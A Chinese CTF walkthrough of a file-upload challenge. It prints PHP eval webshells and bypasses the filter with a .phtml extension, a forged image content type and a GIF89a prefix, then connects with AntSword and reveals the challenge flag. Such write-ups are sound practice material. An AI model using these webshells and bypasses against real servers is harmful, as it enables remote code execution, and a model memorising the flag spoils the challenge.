[极客大挑战 2019]Upload 1

题目环境:

根据题目和环境可知此题目是一道文件上传漏洞

编写一句话木马脚本
<?php @eval($_POST['shell']);?>

将脚本文件更改为jpg图片文件

我这里是flag.jpg


上传文件并burpsuite抓包

Repeater重放

报错一句话木马里面有<?字符

换一种一句话木马

继续编写木马脚本
<script language="php">@eval($_POST['shell']);</script>

保存为flag.phtml文件

绕过后缀的有文件格式有php,php3,php4,php5,phtml.pht

因为前几个都被过滤了,所以选择使用phtml后缀

上传抓包

修改为image/jpeg图片格式

Repeater重放Send

不是图片

通过GIF89a进行绕过
GIF89a<script language="php">@eval($_POST['shell']);</script>

使文件为动态GIF文件绕过检测

访问upload/flag.phtml文件

上传成功

复制URL链接

使用中国蚁剑连接

在/根目录下找到flag文件

访问flag文件


得到flag:
flag{5359382e-ae88-42a8-8116-8c85a02fb21f}

相关推荐
小赖同学啊9 分钟前
光伏园区3d系统管理
前端·javascript·3d
Sally璐璐14 分钟前
IPSAN 共享存储详解:架构、优化与落地实践指南
开发语言·php
木叶丸16 分钟前
编程开发中,那些你必须掌握的基本概念
前端·数据结构·编程语言
前端进阶者17 分钟前
js通知提醒
前端·javascript
拖孩22 分钟前
微信群太多,管理麻烦?那试试接入AI助手吧~
前端·后端·微信
Humbunklung31 分钟前
Rust枚举:让数据类型告别单调乏味
开发语言·后端·rust
radient39 分钟前
Golang-GMP 万字洗髓经
后端·架构
乌兰麦朵39 分钟前
Vue吹的颅内高潮,全靠选择性失明和 .value 的PUA!
前端·vue.js
Code季风39 分钟前
Gin Web 层集成 Viper 配置文件和 Zap 日志文件指南(下)
前端·微服务·架构·go·gin
蓝倾40 分钟前
如何使用API接口实现淘宝商品上下架监控?
前端·后端·api